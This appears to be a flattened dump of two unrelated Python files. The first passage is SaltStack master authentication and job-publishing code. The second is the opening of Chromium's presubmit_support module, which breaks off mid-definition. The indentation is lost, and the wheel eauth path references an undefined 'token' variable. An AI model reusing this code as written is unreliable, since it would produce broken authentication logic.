= ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: name = self.loadauth.load_name(clear_load) if not (name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']]): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if not self.loadauth.time_auth(clear_load): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) good = self.ckminions.runner_check( self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.async(fun, clear_load.get('kwarg', {}), clear_load.get('username', 'UNKNOWN')) except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) except Exception as exc: log.error( 'Exception occurred in the runner system: {0}'.format(exc) ) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' # All wheel ops pass through eauth if 'token' in clear_load: try: token = self.loadauth.get_tok(clear_load['token']) except Exception as exc: msg = 'Exception occurred when generating auth token: {0}'.format( exc) log.error(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if not token: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['eauth'] not in self.opts['external_auth']: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['name'] not in self.opts['external_auth'][token['eauth']]: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) good = self.ckminions.wheel_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "token" occurred for ' 'user {0}.').format(token['name']) log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) jid = salt.utils.gen_jid() fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': token['name']} try: self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, **clear_load) data['return'] = ret data['success'] = True self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error(exc) log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} if 'eauth' not in clear_load: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: name = self.loadauth.load_name(clear_load) if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if not self.loadauth.time_auth(clear_load): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) good = self.ckminions.wheel_check( self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) jid = salt.utils.gen_jid() fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': clear_load.get('username', 'UNKNOWN')} try: self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, **clear_load) data['return'] = ret data['success'] = True self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error( 'Exception occurred in the wheel system: {0}'.format(exc) ) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. ''' if 'eauth' not in clear_load: log.warning('Authentication failure of type "eauth" occurred.') return '' if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail log.warning('Authentication failure of type "eauth" occurred.') return '' try: name = self.loadauth.load_name(clear_load) if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])): log.warning('Authentication failure of type "eauth" occurred.') return '' if not self.loadauth.time_auth(clear_load): log.warning('Authentication failure of type "eauth" occurred.') return '' return self.loadauth.mk_token(clear_load) except Exception as exc: log.error( 'Exception occurred while authenticating: {0}'.format(exc) ) return '' def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' extra = clear_load.get('kwargs', {}) # check blacklist/whitelist good = True # Check if the user is blacklisted for user_re in self.opts['client_acl_blacklist'].get('users', []): if re.match(user_re, clear_load['user']): good = False break # check if the cmd is blacklisted for module_re in self.opts['client_acl_blacklist'].get('modules', []): # if this is a regular command, its a single function if type(clear_load['fun']) == str: funs_to_check = [clear_load['fun']] # if this a compound function else: funs_to_check = clear_load['fun'] for fun in funs_to_check: if re.match(module_re, fun): good = False break if good is False: log.error( '{user} does not have permissions to run {function}. Please ' 'contact your local administrator if you believe this is in ' 'error.\n'.format( user=clear_load['user'], function=clear_load['fun'] ) ) return '' # to make sure we don't step on anyone else's toes del good # Check for external auth calls if extra.get('token', False): # A token was passed, check it try: token = self.loadauth.get_tok(extra['token']) except Exception as exc: log.error( 'Exception occurred when generating auth token: {0}'.format( exc ) ) return '' if not token: log.warning('Authentication failure of type "token" occurred.') return '' if token['eauth'] not in self.opts['external_auth']: log.warning('Authentication failure of type "token" occurred.') return '' if not ((token['name'] in self.opts['external_auth'][token['eauth']]) | ('*' in self.opts['external_auth'][token['eauth']])): log.warning('Authentication failure of type "token" occurred.') return '' good = self.ckminions.auth_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "token" occurred.' ) return '' clear_load['user'] = token['name'] log.debug('Minion tokenized user = "{0}"'.format(clear_load['user'])) elif 'eauth' in extra: if extra['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' try: name = self.loadauth.load_name(extra) if not ((name in self.opts['external_auth'][extra['eauth']]) | ('*' in self.opts['external_auth'][extra['eauth']])): log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' if not self.loadauth.time_auth(extra): log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' except Exception as exc: log.error( 'Exception occurred while authenticating: {0}'.format(exc) ) return '' auth_list = self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*'] # Auth has succeeded, get groups this user is a member of groups = self.loadauth.get_groups(extra) if groups: auth_list = self.ckminions.gather_groups(self.opts['external_auth'][extra['eauth']], groups, auth_list) good = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob') ) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' clear_load['user'] = name # Verify that the caller has root on master elif 'user' in clear_load: if clear_load['user'].startswith('sudo_'): # If someone can sudo, allow them to act as root if clear_load.get('key', 'invalid') == self.key.get('root'): clear_load.pop('key') elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]: log.warning( 'Authentication failure of type "user" occurred.' ) return '' elif clear_load['user'] == self.opts.get('user', 'root'): if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]: log.warning( 'Authentication failure of type "user" occurred.' ) return '' elif clear_load['user'] == 'root': if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')): log.warning( 'Authentication failure of type "user" occurred.' ) return '' elif clear_load['user'] == salt.utils.get_user(): if clear_load.pop('key') != self.key.get(clear_load['user']): log.warning( 'Authentication failure of type "user" occurred.' ) return '' else: if clear_load['user'] in self.key: # User is authorised, check key and check perms if clear_load.pop('key') != self.key[clear_load['user']]: log.warning( 'Authentication failure of type "user" occurred.' ) return '' if clear_load['user'] not in self.opts['client_acl']: log.warning( 'Authentication failure of type "user" occurred.' ) return '' good = self.ckminions.auth_check( self.opts['client_acl'][clear_load['user']], clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "user" ' 'occurred.' ) return '' else: log.warning( 'Authentication failure of type "user" occurred.' ) return '' else: if clear_load.pop('key') != self.key[salt.utils.get_user()]: log.warning( 'Authentication failure of type "other" occurred.' ) return '' # Retrieve the minions list minions = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob') ) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions } } # Retrieve the jid if not clear_load['jid']: fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) clear_load['jid'] = self.mminion.returners[fstr](nocache=extra.get('nocache', False)) self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, } # Announce the job on the event bus self.event.fire_event(new_job_load, 'new_job') # old dup event self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: try: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load) except KeyError: log.critical( 'The specified returner used for the external job cache ' '"{0}" does not have a save_load function!'.format( self.opts['ext_job_cache'] ) ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"{0}" does not have a save_load function!'.format( self.opts['master_job_cache'] ) ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'user' in clear_load: log.info( 'User {user} Published command {fun} with jid {jid}'.format( **clear_load ) ) load['user'] = clear_load['user'] else: log.info( 'Published command {fun} with jid {jid}'.format( **clear_load ) ) log.debug('Published command details {0}'.format(load)) payload['load'] = self.crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) pub_sock.send(self.serial.dumps(payload)) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions } }
presubmit_support.py
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Enables directory-specific presubmit checks to run at upload and/or commit. """ __version__ = '1.8.0' # TODO(joi) Add caching where appropriate/needed. The API is designed to allow # caching (between all different invocations of presubmit scripts for a given # change). We should add it as our presubmit scripts start feeling slow. import ast # Exposed through the API. import cpplint import cPickle # Exposed through the API. import cStringIO # Exposed through the API. import contextlib import fnmatch # Exposed through the API. import glob import inspect import itertools import json # Exposed through the API. import logging import marshal # Exposed through the API. import multiprocessing import optparse import os # Somewhat exposed through the API. import pickle # Exposed through the API. import random import re # Exposed through the API. import signal import sys # Parts exposed through API. import tempfile # Exposed through the API. import threading import time import traceback # Exposed through the API. import types import unittest # Exposed through the API. import urllib2 # Exposed through the API. import urlparse from warnings import warn # Local imports. import fix_encoding import gclient_utils import git_footers import gerrit_util import owners import owners_finder import presubmit_canned_checks import scm import subprocess2 as subprocess # Exposed through the API. # Ask for feedback only once in program lifetime. _ASKED_FOR_FEEDBACK = False class PresubmitFailure(Exception): pass class CommandData(object): def __init__(self, name, cmd, kwargs, message): self.name = name self.cmd = cmd self.stdin = kwargs.get('stdin', None) self.kwargs = kwargs self.kwargs['stdout'] = subprocess.PIPE self.kwargs['stderr'] = subprocess.STDOUT self.kwargs['stdin'] = subprocess.PIPE self.message = message self.info = None # Adapted from # https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37 # # An object that catches SIGINT sent to the Python process and notices # if processes passed to wait() die by SIGINT (we need to look for # both of those cases, because pressing Ctrl+C can result in either # the main process or one of the subprocesses getting the signal). # # Before a SIGINT is seen, wait(p) will simply call p.wait() and # return the result. Once a SIGINT has been seen (in the main process # or a subprocess, including the one the current call is waiting for), # wait(p) will call p.terminate() and raise ProcessWasInterrupted. class SigintHandler(object): class ProcessWasInterrupted(Exception): pass sigint_returncodes = {-signal.SIGINT, # Unix -1073741510, # Windows } def __init__(self): self.__lock = threading.Lock() self.__processes = set() self.__got_sigint = False signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt()) def __on_sigint(self): self.__got_sigint = True while self.__processes: try: self.__processes.pop().terminate() except OSError: pass def interrupt(self): with self.__lock: self.__on_sigint() def got_sigint(self): with self.__lock: return self.__got_sigint def wait(self, p, stdin): with self.__lock: if self.__got_sigint: p.terminate() self.__processes.add(p) stdout, stderr = p.communicate(stdin) code = p.returncode with self.__lock: self.__processes.discard(p) if code in self.sigint_returncodes: self.__on_sigint() if self.__got_sigint: raise self.ProcessWasInterrupted return stdout, stderr sigint_handler = SigintHandler() class ThreadPool(object): def __init__(self, pool_size=None): self._pool_size = pool_size or multiprocessing.cpu_count() self._messages = [] self._messages_lock = threading.Lock() self._tests = [] self._tests_lock = threading.Lock() self._nonparallel_tests = [] def CallCommand(self, test): """Runs an external program. This function converts invocation of .py files and invocations of "python" to vpython invocations. """ vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython' cmd = test.cmd if cmd[0] == 'python': cmd = list(cmd) cmd[0] = vpython elif cmd[0].endswith('.py'): cmd = [vpython] + cmd try: start = time.time() p = subprocess.Popen(cmd, **test.kwargs) stdout, _ = sigint_handler.wait(p, test.stdin) duration = time.time() - start except OSError as e: duration = time.time() - start return test.message( '%s exec failure (%4.2fs)\n %s' % (test.name, duration, e)) if p.returncode != 0: return test.message( '%s (%4.2fs) failed\n%s' % (test.name, duration, stdout)) if test.info: return test.info('%s (%4.2fs)' % (test.name, duration)) def AddTests(self, tests, parallel=True): if parallel: self._tests.extend(tests) else: self._nonparallel_tests.extend(tests) def RunAsync(self): self._messages = [] def _WorkerFn(): while True: test = None with self._tests_lock: if not self._tests: break test = self._tests.pop() result = self.CallCommand(test) if result: with self._messages_lock: self._messages.append(result) def _StartDaemon(): t = threading.Thread(target=_WorkerFn) t.daemon = True t.start() return t while self._nonparallel_tests: test = self._nonparallel_tests.pop() result = self.CallCommand(test) if result: self._messages.append(result) if self._tests: threads = [_StartDaemon() for _ in range(self._pool_size)] for worker in threads: worker.join() return self._messages def normpath(path): '''Version of os.path.normpath that also changes backward slashes to forward slashes when not running on Windows. ''' # This is safe to always do because the Windows version of os.path.normpath # will replace forward slashes with backward slashes. path = path.replace(os.sep, '/') return os.path.normpath(path) def _RightHandSideLinesImpl(affected_files): """Implements RightHandSideLines for InputApi and GclChange.""" for af in affected_files: lines = af.ChangedContents() for line in lines: yield (af, line[0], line[1]) class PresubmitOutput(object): def __init__(self, input_stream=None, output_stream=None): self.input_stream = input_stream self.output_stream = output_stream self.reviewers = [] self.more_cc = [] self.written_output = [] self.error_count = 0 def prompt_yes_no(self, prompt_string): self.write(prompt_string) if self.input_stream: response = self.input_stream.readline().strip().lower() if response not in ('y', 'yes'): self.fail() else: self.fail() def fail(self): self.error_count += 1 def should_continue(self): return not self.error_count def write(self, s): self.written_output.append(s) if self.output_stream: self.output_stream.write(s) def getvalue(self): return ''.join(self.written_output) # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitResult(object): """Base class for result objects.""" fatal = False should_prompt = False def __init__(self, message, items=None, long_text=''): """ message: A short one-line message to indicate errors. items: A list of short strings to indicate where errors occurred. long_text: multi-line text output, e.g. from another tool """ self._message = message self._items = items or [] self._long_text = long_text.rstrip() def handle(self, output): output.write(self._message) output.write('\n') for index, item in enumerate(self._items): output.write(' ') # Write separately in case it's unicode. output.write(str(item)) if index < len(self._items) - 1: output.write(' \\') output.write('\n') if self._long_text: output.write('\n***************\n') # Write separately in case it's unicode. output.write(self._long_text) output.write('\n***************\n') if self.fatal: output.fail() # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitError(_PresubmitResult): """A hard presubmit error.""" fatal = True # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitPromptWarning(_PresubmitResult): """An warning that prompts the user if they want to continue.""" should_prompt = True # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitNotifyResult(_PresubmitResult): """Just print something to the screen -- but it's not even a warning.""" pass # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _MailTextResult(_PresubmitResult): """A warning that should be included in the review request email.""" def __init__(self, *args, **kwargs): super(_MailTextResult, self).__init__() raise NotImplementedError() class GerritAccessor(object): """Limited Gerrit functionality for canned presubmit checks to work. To avoid excessive Gerrit calls, caches the results. """ def __init__(self, host): self.host = host self.cache = {} def _FetchChangeDetail(self, issue): # Separate function to be easily mocked in tests. try: return gerrit_util.GetChangeDetail( self.host, str(issue), ['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS']) except gerrit_util.GerritError as e: if e.http_status == 404: raise Exception('Either Gerrit issue %s doesn\'t exist, or ' 'no credentials to fetch issue details' % issue) raise def GetChangeInfo(self, issue): """Returns labels and all revisions (patchsets) for this issue. The result is a dictionary according to Gerrit REST Api. https://gerrit-review.googlesource.com/Documentation/rest-api.html However, API isn't very clear what's inside, so see tests for example. """ assert issue cache_key = int(issue) if cache_key not in self.cache: self.cache[cache_key] = self._FetchChangeDetail(issue) return self.cache[cache_key] def GetChangeDescription(self, issue, patchset=None): """If patchset is none, fetches current patchset.""" info = self.GetChangeInfo(issue) # info is a reference to cache. We'll modify it here adding description to # it to the right patchset, if it is not yet there. # Find revision info for the patchset we want. if patchset is not None: for rev, rev_info in info['revisions'].iteritems(): if str(rev_info['_number']) == str(patchset): break else: raise Exception('patchset %s doesn\'t exist in issue %s' % ( patchset, issue)) else: rev = info['current_revision'] rev_info = info['revisions'][rev] return rev_info['commit']['message'] def GetDestRef(self, issue): ref = self.GetChangeInfo(issue)['branch'] if not ref.startswith('refs/'): # NOTE: it is possible to create 'refs/x' branch, # aka 'refs/heads/refs/x'. However, this is ill-advised. ref = 'refs/heads/%s' % ref return ref def GetChangeOwner(self, issue): return self.GetChangeInfo(issue)['owner']['email'] def GetChangeReviewers(self, issue, approving_only=True): changeinfo = self.GetChangeInfo(issue) if approving_only: labelinfo = changeinfo.get('labels', {}).get('Code-Review', {}) values = labelinfo.get('values', {}).keys() try: max_value = max(int(v) for v in values) reviewers = [r for r in labelinfo.get('all', []) if r.get('value', 0) == max_value] except ValueError: # values is the empty list reviewers = [] else: reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', []) return [r.get('email') for r in reviewers] class OutputApi(object): """An instance of OutputApi gets passed to presubmit scripts so that they can output various types of results. """ PresubmitResult = _PresubmitResult PresubmitError = _PresubmitError PresubmitPromptWarning = _PresubmitPromptWarning PresubmitNotifyResult = _PresubmitNotifyResult MailTextResult = _MailTextResult def __init__(self, is_committing): self.is_committing = is_committing self.more_cc = [] def AppendCC(self, cc): """Appends a user to cc for this change.""" self.more_cc.append(cc) def PresubmitPromptOrNotify(self, *args, **kwargs): """Warn the user when uploading, but only notify if committing.""" if self.is_committing: return self.PresubmitNotifyResult(*args, **kwargs) return self.PresubmitPromptWarning(*args, **kwargs) def EnsureCQIncludeTrybotsAreAdded(self, cl, bots_to_include, message): """Helper for any PostUploadHook wishing to add CQ_INCLUDE_TRYBOTS. Merges the bots_to_include into the current CQ_INCLUDE_TRYBOTS list, keeping it alphabetically sorted. Returns the results that should be returned from the PostUploadHook. Args: cl: The git_cl.Changelist object. bots_to_include: A list of strings of bots to include, in the form "master:slave". message: A message to be printed in the case that CQ_INCLUDE_TRYBOTS was updated. """ description = cl.GetDescription(force=True) include_re = re.compile(r'^CQ_INCLUDE_TRYBOTS=(.*)$', re.M | re.I) prior_bots = [] if cl.IsGerrit(): trybot_footers = git_footers.parse_footers(description).get( git_footers.normalize_name('Cq-Include-Trybots'), []) for f in trybot_footers: prior_bots += [b.strip() for b in f.split(';') if b.strip()] else: trybot_tags = include_re.finditer(description) for t in trybot_tags: prior_bots += [b.strip() for b in t.group(1).split(';') if b.strip()] if set(prior_bots) >= set(bots_to_include): return [] all_bots = ';'.join(sorted(set(prior_bots) | set(bots_to_include))) if cl.IsGerrit(): description = git_footers.remove_footer( description, 'Cq-Include-Trybots') description = git_footers.add_footer( description, 'Cq-Include-Trybots', all_bots, before_keys=['Change-Id']) else: new_include_trybots = 'CQ_INCLUDE_TRYBOTS=%s' % all_bots m = include_re.search(description) if m: description = include_re.sub(new_include_trybots, description) else: description = '%s\n%s\n' % (description, new_include_trybots) cl.UpdateDescription(description, force=True) return [self.PresubmitNotifyResult(message)] class InputApi(object): """An instance of this object is passed to presubmit scripts so they can know stuff about the change they're looking at. """ # Method could be a function # pylint: disable=no-self-use # File extensions that are considered source files from a style guide # perspective. Don't modify this list from a presubmit script! # # Files without an extension aren't included in the list. If you want to # filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list. # Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below. DEFAULT_WHITE_LIST = ( # C++ and friends r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$", r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$", # Scripts r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$", # Other r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$" ) # Path regexp that should be excluded from being considered containing source # files. Don't modify this list from a presubmit script! DEFAULT_BLACK_LIST = ( r"testing_support[\\\/]google_appengine[\\\/].*", r".*\bexperimental[\\\/].*", # Exclude third_party/.* but NOT third_party/WebKit (crbug.com/539768). r".*\bthird_party[\\\/](?!WebKit[\\\/]).*", # Output directories (just in case) r".*\bDebug[\\\/].*", r".*\bRelease[\\\/].*", r".*\bxcodebuild[\\\/].*", r".*\bout[\\\/].*", # All caps files like README and LICENCE. r".*\b[A-Z0-9_]{2,}$", # SCM (can happen in dual SCM configuration). (Slightly over aggressive) r"(|.*[\\\/])\.git[\\\/].*", r"(|.*[\\\/])\.svn[\\\/].*", # There is no point in processing a patch file. r".+\.diff$", r".+\.patch$", ) def __init__(self, change, presubmit_path, is_committing, verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False): """Builds an InputApi object. Args: change: A presubmit.Change object. presubmit_path: The path to the presubmit script being processed. is_committing: True if the change is about to be committed. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests reported via input_api.RunTests for all PRESUBMIT files will be run in parallel. """ # Version number of the presubmit_support script. self.version = [int(x) for x in __version__.split('.')] self.change = change self.is_committing = is_committing self.gerrit = gerrit_obj self.dry_run = dry_run self.parallel = parallel self.thread_pool = thread_pool or ThreadPool() # We expose various modules and functions as attributes of the input_api # so that presubmit scripts don't have to import them. self.ast = ast self.basename = os.path.basename self.cPickle = cPickle self.cpplint = cpplint self.cStringIO = cStringIO self.fnmatch = fnmatch self.glob = glob.glob self.json = json self.logging = logging.getLogger('PRESUBMIT') self.os_listdir = os.listdir self.os_walk = os.walk self.os_path = os.path self.os_stat = os.stat self.pickle = pickle self.marshal = marshal self.re = re self.subprocess = subprocess self.tempfile = tempfile self.time = time self.traceback = traceback self.unittest = unittest self.urllib2 = urllib2 self.is_windows = sys.platform == 'win32' # Set python_executable to 'python'. This is interpreted in CallCommand to # convert to vpython in order to allow scripts in other repos (e.g. src.git) # to automatically pick up that repo's .vpython file, instead of inheriting # the one in depot_tools. self.python_executable = 'python' self.environ = os.environ # InputApi.platform is the platform you're currently running on. self.platform = sys.platform self.cpu_count = multiprocessing.cpu_count() # The local path of the currently-being-processed presubmit script. self._current_presubmit_path = os.path.dirname(presubmit_path) # We carry the canned checks so presubmit scripts can easily use them. self.canned_checks = presubmit_canned_checks # Temporary files we must manually remove at the end of a run. self._named_temporary_files = [] # TODO(dpranke): figure out a list of all approved owners for a repo # in order to be able to handle wildcard OWNERS files? self.owners_db = owners.Database(change.RepositoryRoot(), fopen=file, os_path=self.os_path) self.owners_finder = owners_finder.OwnersFinder self.verbose = verbose self.Command = CommandData # Replace <hash_map> and <hash_set> as headers that need to be included # with "base/containers/hash_tables.h" instead. # Access to a protected member _XX of a client class # pylint: disable=protected-access self.cpplint._re_pattern_templates = [ (a, b, 'base/containers/hash_tables.h') if header in ('<hash_map>', '<hash_set>') else (a, b, header) for (a, b, header) in cpplint._re_pattern_templates ] def PresubmitLocalPath(self): """Returns the local path of the presubmit script currently being run. This is useful if you don't want to hard-code absolute paths in the presubmit script. For example, It can be used to find another file relative to the PRESUBMIT.py script, so the whole tree can be branched and the presubmit script still works, without editing its content. """ return self._current_presubmit_path def AffectedFiles(self, include_deletes=True, file_filter=None): """Same as input_api.change.AffectedFiles() except only lists files (and optionally directories) in the same directory as the current presubmit script, or subdirectories thereof. """ dir_with_slash = normpath("%s/" % self.PresubmitLocalPath()) if len(dir_with_slash) == 1: dir_with_slash = '' return filter( lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash), self.change.AffectedFiles(include_deletes, file_filter)) def LocalPaths(self): """Returns local paths of input_api.AffectedFiles().""" paths = [af.LocalPath() for af in self.AffectedFiles()] logging.debug("LocalPaths: %s", paths) return paths def AbsoluteLocalPaths(self): """Returns absolute local paths of input_api.AffectedFiles().""" return [af.AbsoluteLocalPath() for af in self.AffectedFiles()] def AffectedTestableFiles(self, include_deletes=None, **kwargs): """Same as input_api.change.AffectedTestableFiles() except only lists files in the same directory as the current presubmit script, or subdirectories thereof. """ if include_deletes is not None: warn("AffectedTestableFiles(include_deletes=%s)" " is deprecated and ignored" % str(include_deletes), category=DeprecationWarning, stacklevel=2) return filter(lambda x: x.IsTestableFile(), self.AffectedFiles(include_deletes=False, **kwargs)) def AffectedTextFiles(self, include_deletes=None): """An alias to AffectedTestableFiles for backwards compatibility.""" return self.AffectedTestableFiles(include_deletes=include_deletes) def 